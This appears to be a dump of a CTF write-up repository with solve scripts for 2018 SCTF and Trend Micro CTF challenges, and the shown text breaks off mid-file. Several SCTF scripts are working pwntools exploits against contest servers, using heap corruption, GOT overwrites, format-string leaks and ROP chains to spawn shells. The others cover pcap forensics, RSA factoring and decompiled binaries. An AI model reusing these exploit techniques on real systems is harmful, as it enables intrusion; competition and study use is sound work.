 6 | p = remote("dungeonquest.eatpwnnosleep.com", 31337)
 7 | 
 8 | def add_macro(name, word):
 9 |     p.recvuntil("> ")
10 |     p.send("2\n")
11 |     p.recvuntil("> ")
12 | 
13 |     p.send("1\n")
14 |     p.recvuntil("> ")
15 | 
16 |     p.send("%s\n" % name)
17 |     p.readline()
18 | 
19 |     p.send("%s\n" % word)
20 | 
21 |     p.recvuntil("> ")
22 |     p.send("3\n")
23 | 
24 | def delete_macro(name):
25 |     p.recvuntil("> ")
26 |     p.send("2\n")
27 |     p.recvuntil("> ")
28 | 
29 |     p.send("2\n")
30 |     p.recvuntil("> ")
31 | 
32 |     p.send("%s\n" % name)
33 |     r = p.readline()
34 | 
35 |     p.recvuntil("> ")
36 |     p.send("3\n")
37 |     return r
38 | 
39 | def delete_macro2(name):
40 |     p.recvuntil("> ")
41 |     p.send("2\n")
42 |     p.recvuntil("> ")
43 | 
44 |     p.send("2\n")
45 |     p.recvuntil("> ")
46 | 
47 |     p.send("%s\n" % name)
48 | 
49 | add_macro("fireball", "1")
50 | add_macro("iceball", "1")
51 | delete_macro("fireball")
52 | 
53 | # overwrite the unsorted bin bk
54 | add_macro("fireball", p64(0) + p64(0x4120D0-16))
55 | add_macro("meteo", "1")
56 | 
57 | FREE_GOT = 0x412070
58 | LIBC_START_MAIN_GOT = 0x412028
59 | 
60 | START = 0x4120d8
61 | BUF = START + 0x300
62 | fake_struct = p64(START+8 * 5) + p64(0) + p64(0x100) + p64(LIBC_START_MAIN_GOT) + p64(0x0)
63 | fake_struct2 = p64(0) + p64(0) + p64(0x100) + p64(FREE_GOT) + p64(0x0)
64 | add_macro("fireball", "A"*16 + p64(0x4120d8) + fake_struct + fake_struct2)
65 | 
66 | 
67 | PRINTF_PLT = 0x4009C0
68 | add_macro("iceball", p64(PRINTF_PLT))
69 | 
70 | r = delete_macro("fireball")
71 | libc_base = u64(r.split("macro")[0].ljust(8, "\x00")) - 0x01F7C0
72 | print("LIBC_BASE: %08x" % libc_base)
73 | 
74 | system = libc_base + 0x3D818
75 | add_macro("fireball", "sh;\x00")
76 | add_macro("iceball", p64(system))
77 | delete_macro2("fireball")
78 | 
79 | p.interactive()
80 | 


--------------------------------------------------------------------------------
/2018/sctf/HideInSSL/solve.py:
--------------------------------------------------------------------------------
 1 | from pypacker import ppcap
 2 | from pypacker.layer12 import ethernet
 3 | from pypacker.layer3 import ip
 4 | from pypacker.layer4 import tcp
 5 | import struct
 6 | 
 7 | def u32(x):
 8 |     return struct.unpack('<I', x)[0]
 9 | 
10 | preader = ppcap.Reader(filename="HideInSSL.pcap")
11 | 
12 | npic = 0
13 | 
14 | data = {}
15 | response = {}
16 | 
17 | keys = []
18 | need_to_add = False
19 | 
20 | for ts, buf in preader:
21 |     eth = ethernet.Ethernet(buf)
22 |     try:
23 |         if eth[ethernet.Ethernet, ip.IP, tcp.TCP] is not None:
24 |             if eth[tcp.TCP].dport == 443 and eth.ip.dst_s == "192.168.0.128":
25 |                 for record in eth.ip.tcp.ssl.records:
26 |                     if record.type == 22:
27 |                         x = len("\x01\x00\x00\xab\x03\x03[\x1e\x7f\\")
28 |                         body_len = len(eth.ip.tcp.ssl.records[0].body_bytes)
29 |                         length = u32(record.body_bytes[x:x+4])
30 |                         y = record.body_bytes[x+4:x+4+length]
31 |                         port = eth[tcp.TCP].sport
32 |                         response[port] = y
33 | 
34 |         if eth[tcp.TCP].sport == 443 and eth.ip.src_s == "192.168.0.128":
35 |             port = eth[tcp.TCP].dport
36 |             if eth.ip.tcp.body_bytes == b'1':
37 |                 if not port in data:
38 |                     data[port] = b""
39 |                     keys.append(port)
40 |                 data[port] += response[port]
41 |     except AttributeError:
42 |         pass
43 | 
44 | for i, k in enumerate(keys):
45 |     d = data[k]
46 |     with open("out/%d.jpg" % i, "wb") as f:
47 |         f.write(d)
48 | 
49 | 


--------------------------------------------------------------------------------
/2018/sctf/ThroughTheRouter/solve.py:
--------------------------------------------------------------------------------
1 | from scapy.all import *
2 | 
3 | r = Raw(load='secret')
4 | a=IP(dst='10.0.0.1', src='10.1.7.8')/UDP(dport=22136, sport=5555)/r
5 | print(str(a).encode("hex"))
6 | print(repr(str(a)))
7 | 


--------------------------------------------------------------------------------
/2018/sctf/catch_the_bug/solve.py:
--------------------------------------------------------------------------------
 1 | from pwn import *
 2 | 
 3 | context.log_level = 'debug'
 4 | 
 5 | length = 0
 6 | p = process('./bug_3e99623da36874fd424a4e237866e301d292aa66',
 7 |         env = {'LD_PRELOAD': os.path.join(os.path.abspath(os.path.dirname(__file__)),'disable-alarm/libhook.so')},
 8 |         aslr=False)
 9 | p = remote('catchthebug.eatpwnnosleep.com', 55555)
10 | header = {
11 |     " / `._                     _": 0x1fe,
12 |     "          /x\\       /x\\                ": 0x1b8,
13 |     "  ((((c,               ,7))))  ": 0x1c0,
14 | }
15 | 
16 | libc_base = None
17 | 
18 | def read_banner():
19 |     p.recvuntil(">> ")
20 | 
21 | def find_buglen(bug):
22 |     for k, v in header.items():
23 |         if k in bug:
24 |             return v
25 |     raise ValueError('fail..')
26 | 
27 | def catch_bug(name):
28 |     global length
29 |     while True:
30 |         read_banner()
31 |         p.send("1\n")
32 |         name = name.ljust(4)
33 |         p.recvuntil("...\n")
34 |         r = p.readline()
35 |         if "There is no bug =(" in r:
36 |             continue
37 |         bug = p.recvuntil(">> ")
38 |         length += find_buglen(bug)
39 |         p.send(name)
40 |         break
41 | 
42 | def inspect_bug():
43 |     read_banner()
44 |     p.send("2\n")
45 | 
46 | def report():
47 |     global length
48 |     read_banner()
49 |     p.send("3\n")
50 | 
51 |     p.recvuntil("Report title\n")
52 |     p.send("A" * 64)
53 |     p.recvuntil("Report subtitle\n")
54 |     p.send("A" * 128)
55 | 
56 |     p1 = libc_base + 0x3dbd40 # initial
57 |     p2 = libc_base + 0x3DC8A8 # free_hook
58 | 
59 |     p.recvuntil("Report body\n")
60 |     print("p1: %x, p2: %x" % (p1, p2))
61 |     payload = "A" * (0x708 - length - 8 * 3 - 64 - 128) + p64(p1) + p64(p2)
62 |     payload = "A" * (0x708 - length - 8 * 3 - 64 - 128) + p64(p1 - len(payload) - 1) + p64(p2)
63 |     raw_input("gogo\n")
64 |     p.send(payload + "\n")
65 |     p.recvuntil("Report tag\n")
66 | 
67 |     p.send(p64(libc_base + 0x3DA90D)) # any writable address
68 | 
69 |     p.recvuntil("Report password\n")
70 |     system = libc_base + 0xfccde
71 |     p.send(p64(system))
72 |     p.interactive()
73 | 
74 | catch_bug("%lx")
75 | catch_bug("%lx")
76 | catch_bug("%lx")
77 | 
78 | read_banner()
79 | p.send("2\n")
80 | p.readline()
81 | r = p.readline()
82 | off = 0x3db7a3
83 | #    off = 0x3c56a3
84 | libc_base = int(r, 16) - off
85 | print("LIBC_BASE: %x" % libc_base)
86 | 
87 | one_gadget = libc_base + 0x4526a
88 | inspect_bug()
89 | 
90 | report()
91 | 
92 | p.interactive()
93 | 
94 | 


--------------------------------------------------------------------------------
/2018/sctf/dingJMax/gdbscript:
--------------------------------------------------------------------------------
 1 | b *0x401765
 2 | b *0x4014CE
 3 | 
 4 | commands 2
 5 | silent
 6 | set $rip = 0x401765
 7 | disable 2
 8 | c
 9 | end
10 | 
11 | def fn
12 |   enable 2
13 |   c
14 | end
15 | 
16 | 
17 | disable 2
18 | set $old = 0
19 | commands 1
20 |   silent
21 |   if *(int*)($rbp-0x40) % 20 == 0 && $old != *(int*)($rbp-0x40)
22 |     set $old = *(int*)($rbp-0x40)
23 |     print $old
24 |     if (*(byte*)0x60764c) == 111
25 |       set $rip = 0x40143D
26 |       fn
27 |     else
28 |       if (*(byte*)0x60764d) == 111
29 |         set $rip = 0x40145D
30 |         fn
31 |       else
32 |         if (*(byte*)0x60764e) == 111
33 |           set $rip = 0x40147D
34 |           fn
35 |         else
36 |           if (*(byte*)0x60764f) == 111
37 |             set $rip = 0x40149D
38 |             fn
39 |           end
40 |         end
41 |       end
42 |     end
43 |   end
44 |   c
45 | end
46 | 
47 | 


--------------------------------------------------------------------------------
/2018/sctf/dvchat/solve.py:
--------------------------------------------------------------------------------
 1 | from pwn import *
 2 | import time
 3 | 
 4 | context.log_level='debug'
 5 | p = remote('dvchat.eatpwnnosleep.com', 7779)
 6 | #p = process('./dvchat')
 7 | 
 8 | p.recvuntil("enter your ID: ")
 9 | p.send("%14$s\n")
10 | p.recvuntil("enter your PW: ")
11 | p.send("sh\n")
12 | 
13 | for i in xrange(8):
14 |     p.send("beach".ljust(36) + "\n")
15 |     p.recv(4096)
16 | 
17 | for i in xrange(13):
18 |     p.send("duck".ljust(36) + "\n")
19 |     p.recv(4096)
20 | 
21 | 
22 | FREE_GOT = 0x603018
23 | SCANF_PLT = 0x401170
24 | p.send("\x7f" * 2 + p64(SCANF_PLT).replace("\x00", "") + "\x7f"*(2+9) + p64(FREE_GOT).replace("\x00", "") + "\n")
25 | p.recv(4096)
26 | 
27 | raw_input("aa")
28 | p.send("/quit\n")
29 | p.recv(4096)
30 | 
31 | POP_RDI = 0x401FF3
32 | RET = 0x401FF4
33 | LIBC_START_MAIN_GOT = 0x6030C0
34 | PUTS_PLT = 0x401000
35 | CALL_FREE = 0x401CBB
36 | 
37 | p.send("A"*8
38 |         + p64(POP_RDI) + p64(LIBC_START_MAIN_GOT) + p64(PUTS_PLT)
39 |         + p64(RET) # Fix alignment for scanf
40 |         + p64(CALL_FREE)
41 |         + "A"* 64 + p64(FREE_GOT)
42 |         + "\n")
43 | p.recvuntil("ncurses closed\n")
44 | 
45 | LIBC_START_MAIN_OFF = 0x0000000000020740
46 | libc_base = u64(p.readline().strip().ljust(8, "\x00")) - LIBC_START_MAIN_OFF
47 | print("LIBC_BASE: %x" % libc_base)
48 | 
49 | SYSTEM_OFF = 0x0000000000045390
50 | p.send(p64(libc_base + SYSTEM_OFF) + "\n")
51 | 
52 | p.interactive()
53 | 
54 | # flag: SCTF{N0P4RK1NG4TKA1ST}
55 | 


--------------------------------------------------------------------------------
/2018/sctf/noleak/solve.py:
--------------------------------------------------------------------------------
 1 | import sys
 2 | from pwn import *
 3 | 
 4 | context.log_level = 'debug'
 5 | #p = process("./noleak_a67768f452505a3e8fd4da4454e1a6539876e116")
 6 | p = remote("noleak.eatpwnnosleep.com", 7777)
 7 | 
 8 | p.send("1\n")
 9 | p.recvuntil("me bytes\n")
10 | 
11 | pop_rdi = 0x400E63
12 | system = 0x400880
13 | libc_start_main = 0x400964
14 | 
15 | p.send("A"*(149 - 47) + "CCCC" + "B"*8 + "C" * 6  + (p64(pop_rdi) + p64(system) + p64(libc_start_main)).ljust(29) + "\n")
16 | 
17 | p.send("3\n")
18 | p.recvuntil(" from now!\n")
19 | 
20 | payload = ("a"*(0x70-0x14) + p8(0x70 - 1 + 8) + "A" * 8 + "QQQQQQQQQQQQQQ" + "sh;").ljust(116)
21 | p.send(payload + "\n")
22 | p.send("cat flag_166903c90eadca6ffac515cd8a6787f2>&0\n")
23 | p.interactive()
24 | 


--------------------------------------------------------------------------------
/2018/trendmicro/OceanOfSockets/oceanOfSockets.py:
--------------------------------------------------------------------------------
 1 | # uncompyle6 version 3.2.3
 2 | # Python bytecode 2.7 (62211)
 3 | # Decompiled from: Python 2.7.12 (default, Dec  4 2017, 14:50:18) 
 4 | # [GCC 5.4.0 20160609]
 5 | # Embedded file name: oceanOfSockets.py
 6 | # Compiled at: 2018-09-15 12:19:43
 7 | import requests, httplib, sys
 8 | if len(sys.argv) < 2:
 9 |     sys.exit(0)
10 | host = sys.argv[1]
11 | port = sys.argv[2]
12 | 
13 | def request1():
14 |     r = requests.get(('http://{}/tmctf.html:{}').format(host, port))
15 |     for data in r.iter_content():
16 |         if 'OceanOfSockets' not in data:
17 |             r = requests.get(('http://{}/index.html:{}').format(host, port), headers={'content-type': 'text/html', 'user-agent': 'Edge/12'})
18 |         else:
19 |             break
20 | 
21 | 
22 | def request2():
23 |     r = requests.get(('http://{}/tmctf.html:{}').format(host, port))
24 |     for data in r.iter_content():
25 |         if 'OceanOfSockets' not in data:
26 |             r = requests.get(('http://{}/index.html:{}').format(host, port), headers={'content-type': 'text/html', 'user-agent': 'Edge/12'})
27 |         else:
28 |             break
29 | 
30 | 
31 | def request3():
32 |     r = requests.get(('http://{}/tmctf.html:{}').format(host, port))
33 |     for data in r.iter_content():
34 |         if 'OceanOfSockets' not in data:
35 |             r = requests.get(('http://{}/index.html:{}').format(host, port), headers={'content-type': 'text/html', 'user-agent': 'Edge/12'})
36 |         else:
37 |             break
38 | 
39 | 
40 | def request3():
41 |     r = requests.get(('http://{}/tmctf.html:{}').format(host, port))
42 |     for data in r.iter_content():
43 |         if 'OceanOfSockets' not in data:
44 |             r = requests.get(('http://{}/index.html:{}').format(host, port), headers={'content-type': 'text/html', 'user-agent': 'Edge/12'})
45 |         else:
46 |             break
47 | 
48 | 
49 | def request3():
50 |     r = requests.get(('http://{}/tmctf.html:{}').format(host, port))
51 |     for data in r.iter_content():
52 |         if 'OceanOfSockets' not in data:
53 |             r = requests.get(('http://{}/index.html:{}').format(host, port), headers={'content-type': 'text/html', 'user-agent': 'Edge/12'})
54 |         else:
55 |             break
56 | 
57 | 
58 | def request3():
59 |     r = requests.get(('http://{}/tmctf.html:{}').format(host, port))
60 |     for data in r.iter_content():
61 |         if 'OceanOfSockets' not in data:
62 |             r = requests.get(('http://{}/index.html:{}').format(host, port), headers={'content-type': 'text/html', 'user-agent': 'Edge/12'})
63 |         else:
64 |             break
65 | 
66 | 
67 | def request3():
68 |     r = requests.get(('http://{}/tmctf.html:{}').format(host, port))
69 |     for data in r.iter_content():
70 |         if 'OceanOfSockets' not in data:
71 |             r = requests.get(('http://{}/index.html:{}').format(host, port), headers={'content-type': 'text/html', 'user-agent': 'Edge/12'})
72 |         else:
73 |             break
74 | 
75 | 
76 | def request():
77 |     try:
78 |         connection = httplib.HTTPConnection(sys.argv[1], sys.argv[2])
79 |         connection.request('GET', '/tmctf.html')
80 |         resTMCF = connection.getresponse()
81 |         readData = resTMCF.read()
82 |         if 'OceanOfSockets' in readData:
83 |             headers = {'User-Agent': 'Mozilla Firefox, Edge/12', 'Content-type': 'text/html', 'Cookie': '%|r%uL5bbA0F?5bC0E9b0_4b2?N'}
84 |             connection.request('GET', '/index.html', '', headers)
85 |         else:
86 |             sys.exit(0)
87 |     except:
88 |         pass
89 | 
90 | 
91 | if __name__ == '__main__':
92 |     request()
93 | # okay decompiling ./oceanOfSockets.pyc
94 | 


--------------------------------------------------------------------------------
/2018/trendmicro/OceanOfSockets/solve.py:
--------------------------------------------------------------------------------
 1 | import string
 2 | 
 3 | key = "%|r%uL5bbA0F?5bC0E9b0_4b2?N"
 4 | 
 5 | g1 = []
 6 | g2 = []
 7 | ans = ""
 8 | for j in xrange(len(key)):
 9 |     g1.append(chr((ord(key[j]) + 47) % 256))
10 |     g2.append(chr((ord(key[j]) - 47) % 256))
11 | 
12 |     if g1[-1]  in string.printable:
13 |         ans += g1[-1]
14 |     else:
15 |         ans += g2[-1]
16 | 
17 | print(ans)
18 | 


--------------------------------------------------------------------------------
/2018/trendmicro/RSA/solve.py:
--------------------------------------------------------------------------------
 1 | from fractions import gcd
 2 | ns = [23795719145225386804055015945976331504878851440464956768596487167710701468817080174616923533397144140667518414516928416724767417895751634838329442802874972281385084714429143592029962130216053890866347,
 3 |         46914096084767238967814493997294740286838053572386502727910903794939283633197997427383196569296188299557978279732421725469482678512672280108542428152186999218210536447287087212703368704976239539968977,
 4 |         24543003393712692769038137223030855401835344295968717177380639898023646407807465197761211529143336105057325706788229129519925129413109571220297378014990693203802558792781281981621549760273376606206491]
 5 | 
 6 | def egcd(a, b):
 7 |     if a == 0:
 8 |         return (b, 0, 1)
 9 |     else:
10 |         g, y, x = egcd(b % a, a)
11 |         return (g, x - (b // a) * y, y)
12 | 
13 | def modinv(a, m):
14 |     g, x, y = egcd(a, m)
15 |     if g != 1:
16 |         raise Exception('modular inverse does not exist')
17 |     else:
18 |         return x % m
19 | 
20 | def text2int(text):
21 |     chars = [ord(c) for c in text]
22 |     result  = 0
23 |     for c in chars:
24 |         result *= 256
25 |         result += c
26 |     return result
27 | 
28 | def int2text(message):
29 |     result=""
30 |     while message>0:
31 |         result = chr(int(message)%int(256))+ result
32 |         message=int(message)/int(256)
33 |     return result
34 | 
35 | 	
36 | 	
37 | def encrypt(text, e, N):
38 |     text_int = text2int(text)
39 |     encrypted = pow(text_int, e, N)
40 |     return encrypted
41 | 
42 | def decrypt(x_int, d, N):
43 |     decrypted = pow(x_int, d, N)
44 |     text = int2text(decrypted)
45 |     return text
46 | 
47 | e  =  65537
48 | 
49 | messages = [
50 |     18700320110367574655449823553009212724937318442101140581378358928204994827498139841897479168675123789374462637095265564472109735802305521045676412446455683615469865332270051569768255072111079626023422,
51 |     27979368157170890767030069060194038526134599497456846620984054211906413024410400026053694007247773572972357106574636186987337336771777265971389911503143036021889778839064900818858188026318442675667707,
52 |     24084879450015204136831744759734371350696278325227327049743434712309456808867398488915798176282769616955247276506807739249439515225213919008982824219656080794207250454008942016125074768497986930713993 
53 | 
54 |     ]
55 | for i, m in enumerate(messages):
56 |     n1 = ns[i % 3]
57 |     n2 = ns[(i + 1) % 3]
58 | 
59 |     p = gcd(n1, n2)
60 |     q = n1 / p
61 | 
62 |     phi = (p - 1) * (q - 1)
63 |     d = modinv(e, phi)
64 | 
65 |     print(decrypt(m, d, n1))
66 | 


--------------------------------------------------------------------------------
/2018/trendmicro/c2coin/solve.py:
--------------------------------------------------------------------------------
 1 | x1 = ["2a3a6765742e7570646174653a34362e3134363e", "2e3130392e3232352f61623332383835362f2e2e", "2a3a64646f732e73796e3a38302e3231312e323e", "32312e35372e2e2e2e2e2e2e2e2e2e2e2e2e2e2e", 
 2 | "3163382a3a656e63727970742e6b65793a544d3e", "4354467b637a343634362d3636393539397d2e2e", 
 3 | "2e37332e2e2e2e2e2e2e2e2e2e2e2e2e2e2e2e2e", "312e39363a7265703a38302e3231312e3130393e", "643331353a7363616e3a38302e3231312e32323e",
 4 | "2a3a6765742e7570646174653a3134392e32303e", "302e3137392e3137392f61353036666363302e2e", 
 5 | "2e37332e2e2e2e2e2e2e2e2e2e2e2e2e2e2e2e2e", "312e35373a7265703a38302e3231312e3130393e", "613231633a7363616e3a38302e3231312e32323e", 
 6 | "2a3a6765742e7570646174653a38342e3232313e", "2e36372e35322f66696c65732f3030303435353e", "2f2e2e2e2e2e2e2e2e2e2e2e2e2e2e2e2e2e2e2e",
 7 | "332a3a656e63727970742e6b65793a307866613e", "615a6265343039666161582e2e2e2e2e2e2e2e2e",
 8 | "30612a3a656e63727970742e6b65793a3078663e", "61615a6265343039666161582e2e2e2e2e2e2e2e"]
 9 | 
10 | print(''.join(x1).decode("hex"))
11 | 


--------------------------------------------------------------------------------
/2018/trendmicro/catchme/FAIL:
--------------------------------------------------------------------------------
1 | Fail to solve
2 | 


--------------------------------------------------------------------------------
/2018/trendmicro/catchme/README:
--------------------------------------------------------------------------------
1 | Unpacking by manual unpack
2 |   * Find 1st popa
3 |   * Find 2nd popa
4 |   * Go to OEP
5 |   * Dump binary + LordPE
6 | 


--------------------------------------------------------------------------------
/2018/trendmicro/catchme/filter.py:
--------------------------------------------------------------------------------
 1 | import ipaddress
 2 | ips = set(open('ip.txt').read().strip().split(","))
 3 | rules = open("filter.txt").read().strip().split(",")
 4 | 
 5 | all_matched = []
 6 | 
 7 | for rule in rules:
 8 |     matched = []
 9 |     n = ipaddress.ip_network(rule)
10 |     netw = int(n.network_address)
11 |     mask = int(n.netmask)
12 | 
13 |     for ip in ips:
14 |         a = int(ipaddress.ip_address(ip))
15 |         in_network = (a & mask) == netw
16 |         if in_network:
17 |             matched.append(ip)
18 |     if matched:
19 |         print(rule, matched)
20 |         all_matched.extend(matched)
21 |         print("ips: %d, matched: %d" % (len(ips), len(all_matched)))
22 | 
23 | print(set(ips) - set(all_matched))
24 | 


--------------------------------------------------------------------------------
/2018/trendmicro/connections/FAIL:
--------------------------------------------------------------------------------
1 | Fail to solve
2 | 


--------------------------------------------------------------------------------
/2018/trendmicro/connections/certs/1.crt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/insuyun/CTF-writeup/838addc6c4a4321eb03f557e09f575dd5cb76e68/2018/trendmicro/connections/certs/1.crt


--------------------------------------------------------------------------------
/2018/trendmicro/connections/certs/10.crt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/insuyun/CTF-writeup/838addc6c4a4321eb03f557e09f575dd5cb76e68/2018/trendmicro/connections/certs/10.crt


--------------------------------------------------------------------------------
/2018/trendmicro/connections/certs/11.crt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/insuyun/CTF-writeup/838addc6c4a4321eb03f557e09f575dd5cb76e68/2018/trendmicro/connections/certs/11.crt


--------------------------------------------------------------------------------
/2018/trendmicro/connections/certs/12.crt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/insuyun/CTF-writeup/838addc6c4a4321eb03f557e09f575dd5cb76e68/2018/trendmicro/connections/certs/12.crt


--------------------------------------------------------------------------------
/2018/trendmicro/connections/certs/2.crt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/insuyun/CTF-writeup/838addc6c4a4321eb03f557e09f575dd5cb76e68/2018/trendmicro/connections/certs/2.crt


--------------------------------------------------------------------------------
/2018/trendmicro/connections/certs/3.crt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/insuyun/CTF-writeup/838addc6c4a4321eb03f557e09f575dd5cb76e68/2018/trendmicro/connections/certs/3.crt


--------------------------------------------------------------------------------
/2018/trendmicro/connections/certs/4.crt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/insuyun/CTF-writeup/838addc6c4a4321eb03f557e09f575dd5cb76e68/2018/trendmicro/connections/certs/4.crt


--------------------------------------------------------------------------------
/2018/trendmicro/connections/certs/5.crt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/insuyun/CTF-writeup/838addc6c4a4321eb03f557e09f575dd5cb76e68/2018/trendmicro/connections/certs/5.crt


--------------------------------------------------------------------------------
/2018/trendmicro/connections/certs/6.crt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/insuyun/CTF-writeup/838addc6c4a4321eb03f557e09f575dd5cb76e68/2018/trendmicro/connections/certs/6.crt


--------------------------------------------------------------------------------
/2018/trendmicro/connections/certs/7.crt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/insuyun/CTF-writeup/838addc6c4a4321eb03f557e09f575dd5cb76e68/2018/trendmicro/connections/certs/7.crt


--------------------------------------------------------------------------------
/2018/trendmicro/connections/certs/8.crt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/insuyun/CTF-writeup/838addc6c4a4321eb03f557e09f575dd5cb76e68/2018/trendmicro/connections/certs/8.crt


--------------------------------------------------------------------------------
/2018/trendmicro/connections/certs/9.crt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/insuyun/CTF-writeup/838addc6c4a4321eb03f557e09f575dd5cb76e68/2018/trendmicro/connections/certs/9.crt


--------------------------------------------------------------------------------
/2018/trendmicro/connections/make_crt.py:
--------------------------------------------------------------------------------
 1 | import os
 2 | 
 3 | certs = [open('certs/%d.crt' % i, 'rb').read() for i in xrange(1, 13)]
 4 | 
 5 | if not os.path.exists('certs'):
 6 |     os.mkdir('certs')
 7 | 
 8 | ns = []
 9 | for i,cert in enumerate(certs):
10 |     with open("certs/cert%d.der" % i, "wb") as f:
11 |         f.write(cert)
12 |     os.system("openssl x509 -inform der -in {0}.der -out {0}.pem".format("certs/cert%d" % i))
13 |     os.system("openssl x509 -inform pem -in {0}.pem -pubkey -noout > {0}.pub".format("certs/cert%d" % i))
14 | 
15 |     from Crypto.PublicKey import RSA
16 |     rsa = RSA.importKey(open("certs/cert%d.pub" % i).read())
17 |     assert(rsa.e == 65537)
18 |     ns.append(rsa.n)
19 | 
20 | from Crypto.Util.number import isPrime
21 | from fractions import gcd
22 | 
23 | # pqs = [None] * len(ns)
24 | # 
25 | # for i in xrange(0, len(ns)):
26 | #     for j in xrange(i + 1, len(ns)):
27 | #         if gcd(ns[i], ns[j]) != 1:
28 | #             c = gcd(ns[i], ns[j])
29 | # 
30 | #             for q in [i, j]:
31 | #                 if ns[q] != c:
32 | #                     if pqs[q] == None:
33 | #                         pqs[q] = (c, ns[q] / c)
34 | #                     else:
35 | #                         l = []
36 | #                         for e in pqs[q]:
37 | #                             d = gcd(e, c)
38 | #                             if d != 1:
39 | #                                 l.extend([d, e/d])
40 | #                             else:
41 | #                                 l.append(e)
42 | #                         pqs[q] = l
43 | # for i, pq in enumerate(pqs):
44 | #     if pq:
45 | #         print(i, pq)
46 | #         for e in pq:
47 | #             print(isPrime(e))
48 | 
49 | 
50 | import copy
51 | 
52 | col = set()
53 | primes = copy.copy(ns)
54 | 
55 | change = True
56 | 
57 | while change:
58 |     col = col | set(primes)
59 |     change = False
60 |     new_primes = []
61 |     for i in xrange(len(primes)):
62 |         for j in xrange(i + 1, len(primes)):
63 |             assert(primes[i] != primes[j])
64 |             d = gcd(primes[i], primes[j])
65 |             if d != 1:
66 |                 new_primes.extend([primes[i] / d,  primes[j] / d, d])
67 |                 new_primes = set(new_primes)
68 |                 if 1 in new_primes:
69 |                     new_primes.remove(1)
70 |                 new_primes = list(new_primes)
71 | 
72 |                 change = True
73 | 
74 |     primes = new_primes
75 |     col = col | set(primes)
76 | 
77 | col.add(0x33d6e3e93f724ea9cf1debb48039890fb32b46bbe08264ba821826152c6521d22d9b5109c96bc41d8ae5d86b1651be21b1886f57bd09fc6e6b22f28c37897d425L)
78 | col.add(0x2c324c5b9f43b57a3910c3624f8f67a2deb5d4ed79d1516034f1f5b0a71fca40fd89ed01b468b2bca2e62b7e6f635e5b23394d16345a17a84d3481cc99764ae27L)
79 | 
80 | primes = []
81 | for s in col:
82 |     if isPrime(s):
83 |         primes.append(s)
84 | 
85 | for i, n in enumerate(ns):
86 |     l = []
87 |     y = 1
88 |     for p in primes:
89 |         if n % p == 0:
90 |             l.append(p)
91 |             y *= p
92 |     if y == n:
93 |         print(i, l, n)
94 | 


--------------------------------------------------------------------------------
/2018/trendmicro/connections/solve.py:
--------------------------------------------------------------------------------
 1 | p = 53436947781159654844791094883882513936770958579111494880684867268077018595158636811153470593268022602079608667531742837637180175896171948430428953584715049
 2 | q = 43440807593867497311250166633557882474138277411159911820971466913600375950238418974764035123301627429845877677401735552394932069631135117456122469665985573
 3 | 
 4 | import base64
 5 | dec = base64.urlsafe_b64decode('B24zu056rFEER1Y/QGPUoBlEuN801Zs78PV9Q7Xll0NfAVtkm2QWDRddhVBShrOQ/brjOtRRkgt8he7gtkL2Zf8HKYeCA++m0XsyNiCb035MtIMdcSsy/81Xy2sDTNz5nA3OkDfjUo1Uu8pISFuzMmZPe47yCbrmGLohKVpPUgd9')
 6 | 
 7 | from Crypto.PublicKey import RSA
 8 | from Crypto.Util.number import inverse, isPrime, bytes_to_long, long_to_bytes
 9 | 
10 | assert(isPrime(p) and isPrime(q))
11 | 
12 | import zlib
13 | def inflate(data):
14 |     decompress = zlib.decompressobj(
15 |             16 + zlib.MAX_WBITS  # see above
16 |     )
17 |     inflated = decompress.decompress(data)
18 |     inflated += decompress.flush()
19 |     return inflated
20 | 
21 | e = 65537L
22 | phi = (p-1) * (q-1)
23 | d = inverse(e, phi)
24 | n = p * q
25 | rsa = RSA.construct((n, e, d, p, q))
26 | 
27 | with open("key.inc", "wb") as f:
28 |     f.write(dec)
29 | 
30 | with open("key.pem", "wb") as f:
31 |     f.write(rsa.exportKey('PEM'))
32 | 
33 | #ie = int(dec.encode("hex"), 16)
34 | ie = bytes_to_long(dec)
35 | d = rsa.decrypt(ie)
36 | d = long_to_bytes(d)
37 | 
38 | for i in xrange(256):
39 |     ans = ""
40 |     for j in xrange(len(d)):
41 |         ans += chr((ord(d[j]) ^ i) % 256)
42 | 
43 |     print(ans)
44 | 


--------------------------------------------------------------------------------
/2018/trendmicro/deepdive/extract.py:
--------------------------------------------------------------------------------
1 | f = open("many(8).php", "rb").read()
2 | start = f.index("mausoleum.jpg")
3 | start = f.index("PK", start)
4 | end = f.index("------WebKitFormBoundary", start)
5 | 
6 | open("mausoleum.exe", "wb").write("MZ" + f[start+2:end-2])
7 | 


--------------------------------------------------------------------------------
/2018/trendmicro/deepdive/mausoleum.py:
--------------------------------------------------------------------------------
 1 | # uncompyle6 version 3.2.3
 2 | # Python bytecode 3.7 (3394)
 3 | # Decompiled from: Python 2.7.15 (default, Jul 23 2018, 21:31:33)
 4 | # [GCC 4.2.1 Compatible Apple LLVM 9.0.0 (clang-900.0.39.2)]
 5 | # Embedded file name: mausoleum.py
 6 | # Size of source mod 2**32: 12 bytes
 7 | import random
 8 | feed = input('\n _ feed me something _ \n')
 9 | le = len(feed) - feed.count(' ')
10 | feed = feed.lower()
11 | if feed.isdigit():
12 |     print("\n _ i don't understand numbers _ \n")
13 | else:
14 |     if le > 1:
15 |         print('\n _ too much for me _\n')
16 |     else:
17 |         if le == 0:
18 |             print('\n _ seems your keys are stuck. retry! _\n')
19 |         else:
20 |             if feed == 'f':
21 |                 print('TMCTF{')
22 |             else:
23 |                 if feed == 'l':
24 |                     print('the_s3cr3t_')
25 |                 else:
26 |                     if feed == 'a':
27 |                         print('i$_unE@rth3d')
28 |                     else:
29 |                         if feed == 'g':
30 |                             print('}')
31 |                         else:
32 |                             print(random.randint(0, 999999))
33 | 


--------------------------------------------------------------------------------
/2018/trendmicro/fiestel/solve.py:
--------------------------------------------------------------------------------
  1 | import copy
  2 | import os
  3 | 
  4 | def xor(l, r):
  5 |     return (l | r) - (l & r)
  6 | 
